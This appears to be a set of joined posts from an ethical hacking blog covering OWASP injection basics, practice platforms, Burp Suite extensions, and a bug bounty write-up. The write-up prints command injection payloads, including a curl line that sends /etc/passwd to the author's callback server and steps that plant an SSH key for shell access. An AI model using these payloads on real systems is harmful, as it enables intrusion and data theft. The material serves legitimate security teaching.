I hope you found this content helpful and wish you good luck in your OSCP journey. I encourage you to subscribe to the newsletter and receive an article every Friday to end your week on a hacking content. If you are new to hacking and want to learn the basics, read the OWASP Top 10 theory and hands-on article on thehackerish.com and apply your knowledge on the lab which supports them. If you enjoy learning with videos, I invite you to watch the OWASP Top 10 Youtube playlist.
Hello and welcome to this OWASP Top 10 vulnerabilities course. Today’s blog post is about Injection.
By the end of this post, you will have understood the following points:
What is OWASP Top 10 Injection?
Why Injection is on the top of the OWASP Top 10 vulnerabilities?
What is the difference between error and blind-based injection?
OWASP Top 10 Injection flaws.
How to exploit Injection?
Some real-world Injection attacks
OWASP Top 10 Injection prevention
What is Injection and why it ranks top of OWASP Top 10 vulnerabilities?
Injection sits comfortably on the top of the OWASP TOP 10 vulnerabilities for the last decade. This is for a good reason. In fact, injection is a broad class of vulnerabilities that you can find on pretty much any target. Let’s take the definition of the OWASP Top 10 for injection and analyze it:
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or a query. The attacker’s hostile data can trick the interpreter into performing unintended actions.
I highlighted the key ideas in italic. The first thing to notice is that injection is not specific to a technology. In fact, any feature which expects and processes input is potentially vulnerable to injection.
The second thing to point out is how large the attack surface is. Tell me how many features you encountered which fall under this very scenario! I’d say most of them. In fact, even a simple search feature on a website takes your input, uses it as part of a command, queries a data store and returns the results to you.
Continuing on the example above, a malicious user can inject a malicious input, called the payload, to perform unintended results by the vulnerable system. If successful, the malicious user can trick the application into returning sensitive information, modify data or delete it altogether.
Error based injection vs blind Injection vulnerabilities
When hunting for Injection vulnerabilities, you will typically encounter two use cases. On the one hand, the application can return error messages which your payload triggered. In this case, you can follow the application errors for what to do next. For example, you can inject a malformed SQL query as simple as a quote and you get the following error:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE id=''' at line 1".
This tells you a lot! First, you have successfully found a SQL injection. Second, the database engine is MySQL. Third, the application tells you the exact vulnerable part of the SQL query. Lastly, you’ve got a solid bug to report if you are a bug bounty hunter.
On the other hand, you don’t have direct and naive feedback from the application, but rather a hint, or nothing at all! In this case, we call it a blind injection. It requires more effort, but it’s still possible to exploit it as you can see in the OWASP Top 10 training injection blog post.
Now that you have a general understanding, let’s dive into some instances of OWASP Top 10 Injection flaws.
OWASP Top 10 Injection flaws
There are many subsets of the OWASP Top 10 Injection vulnerability class. Below you find most of them. The list is growing, so make sure to subscribe to the newsletter below so that you get a notification each Friday about new content.
SQL injection is a flaw in the way user data is being handled inside a SQL query. Basically, a developer concatenates the expected input directly into the SQL query. SQL injection is one of the most impactful vulnerabilities that exist, it can affect the confidentiality, integrity and availability. To learn more about SQL injection, feel free to read this in-depth SQL injection tutorial.
OS Command injection
OS command injection is a flaw in the way user data is being handled inside an operating system command. Basically, a developer insecurely puts the expected input directly into the OS command. OS injection is one of the deadliest vulnerabilities that exist in the realm of security vulnerabilities. It allows an attacker to have a remote shell on your vulnerable server. As of its impact, it can affect the confidentiality, integrity and availability. If you want to see a real example, read my write-up about how I found and exploited one.
This injection is a flaw in the way user input is being handled inside an LDAP query. LDAP stands for Lightweight Directory Access Protocol.It is an client-server open industry standard which can be used to access and maintain directory information services. For example, it can be used to authenticate a user, search items, modify entries, etc. Therefore, this type of injection impacts the confidentiality, integrity and availability. You will learn more about LDAP injection in the upcoming blog posts.
OWASP Top 10 Injection attacks
The following are real-world breaches which exploited one of the injections discussed above.
SQL injection in Magento, patch published on March 2019
On its release, Magento urges its users to upgrade to the latest version of Magento. One of the severe vulnerabilities patched was a SQL injection.
On its advisory on May 2018, RedHat announced that Red Hat Enterprise Linux 6 and 7 are vulnerable to a command injection flaw found in a script included in the DHCP client.
SQL injection against TalkTalk
The breach that affected TalkTalk exploited a SQL injection. Over 4 Million customers were at risk. More than 150K customers’ data was compromised and the company was fined 400K pounds.
OWASP Top ten Injection prevention
Since Injection flaws reside in the way user inputs are handled, a developer should never trust any input. If you do, you’re exposing your asset to security risks which can be damaging. For each of the OWASP Top 10 Injection vulnerabilities discussed earlier, there is a section on how to prevent them. But in general, this OWASP Cheat Sheet covers the guidelines you need to follow when writing your code. The main ideas are as follows.
Perform proper input validation: You should sanitize and normalize your input.
Use a safe API: For example, using an ORM is far better and secure than building SQL queries yourself.
Properly escape your input: If you don’t have an API available, make sure to escape special characters according to the interpreter that will handle your command or query.
That’s it for today, in the next episodes of this OWASP Top 10 vulnerabilities tutorial, we will discuss OWASP Top 10 broken authentication. Stay tuned!
I often get asked from many of my friends and colleagues about where should I start to learn to hack. My answer always includes a handful of hacking websites which I found very useful during my journey in this awesome industry. Today I will share with you the best hacking websites you should definitely use.
For those who stumbled upon this blog for the first time, it is dedicated to helping you learn and become a better ethical hacker, the topics cover web application hacking, penetration testing and bug bounty hunting.
Why are hacking websites important?
I always say that you can’t learn hacking without practice. Unfortunately, you can’t practice by hacking arbitrary websites because it is unethical and illegal, to say the least. You could develop your own web applications and then hack them, but that would take a lot of time and effort especially if you are not a developer. This is where hacking websites come into play. In fact, they offer a practical playground ready to be hacked by everyone. If you want to focus on learning a specific vulnerability, you can solve the corresponding challenges. Alternatively, if you want to hack a machine from the start and become root, you can play boot2root challenges. You can even participate in live Capture The Flag challenges, either alone or with a team, and play against other teams. This offers a tremendous opportunity for you not only to learn hacking but also to sharpen your skills and keep them up to date.
How to learn from hacking websites?
Some hacking websites offer challenges without solutions. You might think that this is not practical, but it’s the best way for you to learn. In fact, rushing into the solution without putting in enough effort will not benefit you in any way. When you take your time to understand the problem and solve it on your own, you will never forget it! Besides, real-life hacking involves so many rabbit holes, long hours trying to understand and exploit security vulnerabilities. So, you will be learning while preparing yourself for your future real targets.
Google Gruyere: A hacking website from Google
Google gruyere is a deliberately vulnerable web application that you can hack to learn about many security vulnerabilities. It is available online, which means that you don’t need any lab setup. It includes well-known issues like Cross-Site Scripting, Command Injection and CSRF. Additionally, you can also download the source code to inspect it and perform white-box testing.
Google gruyere is great for beginners because it explains each vulnerability at a time with a corresponding challenge. If you feel blocked, you can show the collapsed hints. Even though it also includes the solution, I don’t recommend you see it.
Easy to use.
Very useful for absolute beginners.
A limited number of vulnerabilities.
Vulnhub: The best hacking website for local boot2root machines
If you have a slow connection and you want to eliminate network latency when you are doing ethical hacking, then VulnHub is your friend. In fact, it is a hacking website which collects virtual machines that you can download one time and install locally on your host using virtualization software such as VirtualBox or VMWare. VulnHub offers so many machines in all difficulty levels. In such scenarios, you boot the virtual machine and your goal is to become root. This is known as a boot2root challenge.
For each machine, there is usually a publicly available solution, but I don’t recommend you read it until you exhaust all the ideas you have in mind. Unfortunately, there are no hints and no forum to exchange ideas between the community members.
Offline hacking eliminates network latency.
A large choice of Virtual Machines to choose from.
There is no forum.
Sometimes, you need to troubleshoot some networking issues when the VM is not reachable from your host machine.
Root me: My old favourite hacking website
Root-me.org is a mature hacking platform that you can use to practice ethical hacking. It is much more than just a simple hacking website. In fact, it offers challenges in many areas, such as web, cryptography, cracking, networking and more. Besides, it hosts CTF boot2root rooms that you can use to boot and hack a live target to become root. Some of these machines come from VulnHub, which makes it convenient for those who don’t like to set up a personal lab. Furthermore, it has a leaderboard and a strong and live community that you can interact with it using IRC or through the forum. Additionally, it offers professional services for companies which seek employees, hacking training, etc.
This ethical hacking platform provides solutions for the challenges it offers. However, you can’t see one unless you solve the corresponding challenge first. This is a great feature because it encourages you to make an effort on your own. To help you during this tough process, it provides you with related documentation that you can use to understand and solve the challenges on your own. Besides, you can find hints in the forum threads, post a message in the IRC chat, or even contact someone who has already solved the challenge.
Four languages: English, French, German and Spanish.
Honestly, I don’t have any. It’s a great platform!
hackthebox: The hacking website for OSCP
After I became top 100 on root-me and rooted a handful of CTF machines, I wanted to tackle challenges similar to the OSCP certification. I Google “OSCP like machines” and I find hackthebox.eu. They offer most of what root-me.org has, with some key differences.
Firstly, you can’t register unless you hack your way in. After you find the flag, you can log in to the platform. It’s not hard to solve that preliminary challenge; it’s just a way to prove that you deserve having an account on this hacking website.
Once I log in, I notice that the user interface is more elegant than the one of root-me.org. I know design taste is a matter of perspective and I don’t really judge a platform by its appearance, but this one just felt professional. On the menu on the left, you can download the VPN file, discover the challenges, the labs, the forum, etc.
Accessing this hacking website through the VPN
One of the key differences between root-me and hackthebox is VPN. In fact, to hack the available machines on the latter, you download your connection pack. Then, you connect to the infrastructure with OpenVPN, an open-source software that allows you to connect using VPN. Don’t get scared if this seems new to you; everything is explained on the platform and you just have to follow the steps.
The challenges and boot2root machines
On the one hand, hackthebox offers challenges the same way root-me does, but the number is still way lower. You don’t need a VPN to access the challenges.
On the other hand, hackthebox offers a wide range of boot2root machines. If you want to prepare for your OSCP certification, this is where you should spend most of your time.
In the free plan, you have access to the new ones. Once they retire, you need a paid plan to be able to hack them. As I mentioned earlier, you need to set up a VPN connection to reach them.
In addition to the awesome boot2root machines, hackthebox offers many hacking labs. These are a couple of machines that compose a full infrastructure. Few of them are accessible directly through the VPN, but most of them require you to obtain a foothold on the infrastructure.
Some of these labs are Active Directory infrastructures developed by hackthebox itself, others are provided by companies which seek ethical hackers to join them. You can find all of them on the menu on the left.
You can join the community and interact with its members through many communication channels, such as the forum, the Discord server and the Mattermost space. You can also send private messages to members and broadcast messages using the shoutbox.
All these communication channels are available on the left menu.
Great quality machines, ideal for OSCP certification preparation.
I honestly don’t see any!
TryHackMe: A new rising hacking website star
This hacking platform is recent. However, it contains exhaustive hacking material in new forms I haven’t seen in any other hacking website.
Accessing TryHackMe challenges
As it is the case with hackthebox, this platform also provides a VPN package that you can use to access the hacking challenges. However, only UDP is supported. If you are in a network which blocks UDP, you can’t currently bypass it as you would do with hackthebox.
These are corners which focus on teaching one thing. For example, if you want to learn the basics of penetration testing, there is a room for that. The same thing for learning how to use Linux and the list goes on. All you have to do is search for the room you want using a filtering system, then enroll and start learning. Some rooms need a paid subscription.
If you are a total beginner in a subject, the learning paths help you cover the basics. These are paid by definition.
King of the Hill
These are CTF challenges like you would see in a typical boot2root scenario, with a key twist! In fact, you can put your name in the file under /root/king.txt to become the king and start gaining points. The players not only exploit the vulnerabilities within the machine, but they also strive to earn the highest score by staying king as long as possible.
You can interact with the community through many communication channels, such as Discord, Twitter, Direct messages, etc.
The rooms and the learning paths are great to learn new subjects.
King of the Hill are fun CTFs.
The community is live.
The VPN package doesn’t support TCP.
hacker101: The hacking website for bug bounty hunters
I’ve talked this hacking website provides on previous episodes, such as when I talked about my bug bounty methodology. This hacking website provides a solid playground for bug bounty hunters with diversified challenges that will twist your mind. They are designed to mimic the real bugs you would find during bug bounty hunting. Besides, you collect points for each challenge you solve, which allows you to get an invite from a private program on HackerOne. However, it doesn’t only provide hacking challenges. In my opinion, there are two other resources you can learn from besides the hacking challenges.
The first one is the Discord server where you can connect and engage with the bug bounty community members.
The second resource I want to draw your attention to is the introductory videos that explain many subjects that relate to bug bounty hunting. Things like web vulnerabilities and mobile hacking.
Great videos resources for future bug bounty hunters
The challenges are unique and similar to what you would find during bug bounty hunting.
Vibrant bug bounty community in the Discord server.
The hacking content and the features are still quite limited compared to other hacking platforms.
Which one of these hacking websites to choose?
You might have started to feel overwhelmed with all these hacking websites and platforms. I hear you wondering where should I start? And do I have to subscribe and use all of them?
The answer is no! While each hacking website and platform brings its unique features and user experience, all of them share the same core building blocks, which are hands-on challenges. As the number of such resources contains to grow, you just have to choose one or two which suit your taste and needs. Occasionally, you may experiment with new rising hacking websites and platforms, which might replace your current ones.
I started my hacking journey when the major hacking websites I had were VulnHub and Root-me around. Once I discovered hackthebox, I got addicted to their machines, especially since I was preparing my OSCP certification. Lately, I came across tryhackme, which offered a great gamification experience on top of the practical hacking content.
In this article, I tried to collect the best hacking websites and platforms that will surely help you in your hacking career. Whether you are an absolute beginner or an advanced ethical hacker, I’m sure you will find a match.
However, this is not a complete list. There are other hacking websites like OWASP WebGoat and OWASP JuiceShop, which I have used as a hacking lab for the OWASP Top 10 training. Then, there is Portswigger Academy which I already covered in a previous episode. And finally, there is the classic CTFtime, which is dedicated to Capture the Flag events.
Hello ethical hackers and bug bounty hunters! Welcome to this bug bounty write-up where I show you how I found a Server-Side Request Forgery vulnerability (SSRF). Then, I will explain how I was able to escalate it to obtain a Remote Code Execution (RCE). Finally, you will see how it is possible to gain a full SSH shell on the vulnerable server.
If all this seems intimidating for you, let me tell you that you shouldn’t be; just make sure you stick with me until the end. I promise you are going to learn many things today!
What app is this bug bounty write-up targeting?
Before diving into the details, let’s understand what the application does.
Simply put, the web application I hacked is a file-sharing system that allows users to securely exchange files. It also has an administrative panel dedicated to the administrators for management purposes. They can create users, configure internal servers and networks, etc.
To honour the responsible disclosure policy, I will not tell the name of this application. However, this does not affect what you will be learning. You can definitely apply these tips and tricks on the bug bounty programs or the penetration testing projects you are working on.
Bug bounty write-up phase 1: Enumeration
The first phase of any security testing is Enumeration. In my bug bounty methodology, I explained what are the key questions you need to answer during this phase.
In the context of this application, I focused on the administration panel since it contained many interesting features. One of them is the possibility to configure a migration server. This feature has a multi-stage wizard.
Whenever I see a complex feature, I tend to put it at the top of the list since the developers will likely make more mistakes. And this particular case was no different!
In fact, during one of the many configuration steps, the application asks for the IP address or the hostname of the migration server. For me, I started hearing inner-voices screaming: SSRF! SSRF! SSRF!
Bug bounty write-up phase 2: Exploiting the SSRF
Wait…What is SSRF in the first place?
SSRF stands for Server-Side Request Forgery. It is a security vulnerability which happens if you can meet two conditions:
The application initiates a request to a target server.
You control part or all of the target server through user input.
SSRF can be handy to pivot inside the IT infrastructure of your target. This is possible because the vulnerable server generally runs next to neighbour systems which are not directly accessible. You can see this in action when I demonstrate how I accessed the APK file during the Hackerone H1-2006 CTF challenge write-up.
Exploiting the SSRF
In the case of this web application, I simply put my web server’s hostname in the migration server’s input field. Upon hitting the Next button, I received an HTTP callback. This means that the application takes the hostname input and initiates an HTTP request to a server of my choice.
What is the impact?
Receiving a callback is not necessarily a security issue unless the server discloses sensitive data in the request. You must test if you can reach internal assets. In other words, you should be able to access services which are not directly exposed. Unfortunately, many bug bounty hunters fall for this mistake and their reports get closed as Not Applicable to Informative.
In the case of this web application, I get different error messages depending on whether there is a service running or not, but that’s all about it! I can’t interact with those services. Therefore, this SSRF is not impactful enough.
But wait! Maybe I can run arbitrary commands and exfiltrate the results in the callback.
Escalating to Remote Code Execution (RCE)
This time, instead of using my domain as a callback, I injected an operating system (OS) command as part of the callback subdomain. Technically, I used the payload “whoami.mycallback.server. Consequently, I got an HTTP request callback to uzer.mycallback.server !
If you don’t understand the above payload, here is what’s happening:
The whoami runs the command whoami. This is possible thanks to the back-ticks around it. In this case, the command returns uzer .
The server sends an HTTP callback request to my server while disclosing the result of the OS command in the subdomain part.
This is clear proof that I can successfully run OS commands on the vulnerable server, which is all good, but can I run arbitrary commands?
Bug bounty write-up bonus: Getting a full shell
While the proof-of-concept (POC) that I have so far demonstrates impact, I wanted to be sure I’m getting the full bug bounty. To do that, I needed to prove that I can run arbitrary commands, not just single-word commands like whoami.
To achieve this, I needed to read and write files. You will understand why shortly, but for now, let’s see how we can fulfil those two requirements.
Reading internal files
Instead of using whomai, I run curl -F ‘@/etc/passwd mycallback.server’.mycallback.server. Therefore, I exfiltrated the content of the file /etc/passwd in the POST data which I receive back on mycallback.server.
Although I was using a mal-formatted hostname syntax in my payload, I still could run the OS command since the server evaluates it before anything else.
Writing to internal files
To demonstrate the ability to create and edit the server’s files, I run echo test | tee /tmp/POC. Then, I fetched its content using the same technique I used to read the /etc/passwd file.
Finally, getting the SSH shell
Because the server is running a publicly accessible SSH server, what if I could log into it without any need for a password?
To achieve this, the steps are as follow:
Generate a key pair using the command ssh-keygen on my attacking machine.
Append the public key to the file /home/uzer/.ssh/authorized_keys on the vulnerable server using the same technique I used earlier to write the file /tmp/POC.
Log into the SSH server using my private key and the user uzer using ssh -i private.key email@example.com .
As a result of this clear and precise impact, the team quickly triaged my report and awarded me with the highest bounty.
Chaining vulnerabilities can be devastating. In this bug bounty write-up, you learned how to combine both SSRF and Command injection to achieve Remote Code Execution on the vulnerable server. Besides, you learned how to gain a stable shell by leveraging the exposed SSH server. Finally, you learned that it’s important to demonstrate a clear impact if you want to receive the highest bounty.
I hope you enjoyed reading this article as much as I enjoyed writing it. Until the next episode, stay curious, keep learning and go find some bugs.
Hello ethical hackers and bug bounty hunters. Today, you will learn the top 10 Burp Suite extensions I found myself using over and over again. They assist me in different areas, such as pretty-printing data, actively testing for specific vulnerability classes, parsing API definitions and brute-forcing.
Wsdler is your burp extension for SOAP
During your penetration testing or bug bounty hunting, you might encounter SOAP-based APIs. They are web services that you can consume according to a file which describes the actions they expose and how to call them. This file is based on the Web Services Description Language (WSDL).
Whenever you find one, you can parse it using Wsdler. Additionally, this Burp extension constructs the HTTP requests as the API expects them.
Before Burp Suite rolled its Pretty button feature, this was the first extension I needed to install after any fresh Burp Suite setup. Nowadays, the majority of web application use RESTful APIs which generally use JSON objects to transfer data between the client and the server. JSON Beautifier prettifies the inline JSON data to make your life easier.
This Burp extension is free and can be used in either Burp Suite Community Edition or Professional.
J2EEScan is a great burp extension for Java EE applications
In my penetration testing assignments, I usually test J2EE web applications, which are Java web applications that support enterprise-level requirements, such as scalability and availability. Therefore, I use J2EEScan to assist me in finding vulnerabilities for the most common CVEs that target J2EE technologies.
The extension adds test cases to the BurpSuite Scanner. Therefore, there no additional configuration after you install it. All you have to do is run a scan and wait for vulnerabilities in the Issue Activity panel in the Burp’s Dashboard tab.
JSON WEB Tokens, the Burp extension, not the standard
[…] an open standard […] that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
When you do bug bounty hunting or web application penetration testing, it is a pain to manually copy the tokens from Burp Suite and paste them into your favourite parsing tool, such as jwt.io. This extension allows you to parse the token within Burp, the same way JSON Beautifier prettifies inline JSON objects.
For those of you who don’t know what SAML, it’s a standard used in Single Sign-On (SSO) for authentication. Here is a brief definition from Wikipedia:
Security Assertion Markup Language (SAML) […] is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is an XML-based markup language for security assertions.
Since SAML requests contain long base64 encoded XML data, it is impractical to manually parse them. SAML Raider automatically performs the parsing within Burp Suite. Additionally, you can use it to perform known attacks against your target web application. In fact, it comes with pre-configured exploitation techniques, such as signature wrapping, that you can easily run to test for weaknesses in SAML implementations.
AuthMatrix burp extension for broken access control
I’ve already covered this great extension in a Youtube video. It allows you to test for broken access control vulnerabilities, such as IDOR, unprotected endpoints, etc. The flow is fairly simple. Firstly, you browse your target application and send any interesting requests to this extension. Then, you create the target users, such as the attacker and the victim. Then, for each user, you configure the session cookies, and any HTTP headers containing tokens such as JWT or API keys. Lastly, you hit the run button and let AuthMatrix highlight the suspicious requests in red.
HTTP request smuggler
This is the go-to Burp extension when you want to easily detect and exploit a web application through HTTP Request Smuggling.
It detects whether you have a CL.TE or TE.CL condition and reports it directly into Burp Suite’s Dashboard tab, under the Issue Activity menu where all the issues get listed.
If you have no clue about what do CL.TE and TE.CL means, I invite you to read this article from the authors of Burp Suite.
This extension allows you to send large numbers of HTTP requests to a target web application. If you have Burp Community, you know that you can only work with a limited version of the Intruder which does not support multiple threads. Instead, you can use Turbo Intruder.
Since this Burp extension uses a Python snippet that you can edit, I recommend you get familiar with the basics of the Python programming language. That way, you can customize Turbo Intruder to bring more flexibility when you brute force.
Whenever you encounter a file upload feature that uses the multipart mime type, I encourage you to give this Burp extension a try. In fact, you can use it to probe the upload features for many security issues.
It fuzzes all the parameters using a set of organized categories that you can choose from. If the application retrieves the uploads, you can configure Upload Scanner to fetch the files to verify cases like XSS.
There are plenty of other features in this awesome Burp extension. I encourage you to learn more about it. Additionally, I prepared this Youtube video to show you how it works.
Java Deserialization Scanner
This Burp extension checks for insecure deserialization issues in Java applications. It uses pre-built serialized java objects to probe the application for a callback. You can configure this feedback to be either a time delay or a callback. If the application sleeps for some time before responding, or if you receive a hit as a callback, the extension highlights exactly what payload has triggered it. Therefore, you can prepare your own payload using tools such as ysoserial.
If you want to learn how insecure deserialization works and how to exploit it with real examples, I invite you to read this article.
There are so many tools, extensions and methodologies available a few clicks away. However, I should mention that you don’t have to use them all. Take some time to discover how they work, then pick the ones that suit your taste and your needs.
Hopefully, this episode has shown you some new Burp extensions that might help you in your next assignment.
Until the next episode, stay curious, keep learning and go find some bugs!